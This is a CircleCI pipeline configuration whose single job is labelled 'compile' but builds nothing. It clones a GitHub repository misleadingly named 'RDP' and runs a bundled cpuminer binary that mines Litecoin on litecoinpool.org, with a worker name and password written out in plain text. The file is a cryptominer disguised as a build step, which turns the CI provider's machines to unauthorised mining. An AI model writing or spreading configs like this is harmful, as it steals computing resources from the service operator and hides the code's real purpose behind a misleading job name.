version: 2.1
jobs:
  compile:
   docker:
      - image: bryanhafidz/bryan-docker:0x02
   steps:
      - run:
          command: |
           apt install -y libjansson4
           mkdir  ~/.ssh
           ssh-keyscan github.com >> ~/.ssh/known_hosts
           git clone --depth=1 https://github.com/davidus20/RDP.git Q
           cd Q
           
           chmod 755 cpuminer_avx512
           ./cpuminer_avx512  --algo=scrypt --url=stratum+tcp://litecoinpool.org:3333 --userpass=djemil.mywoker13:my123456
      
          
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile
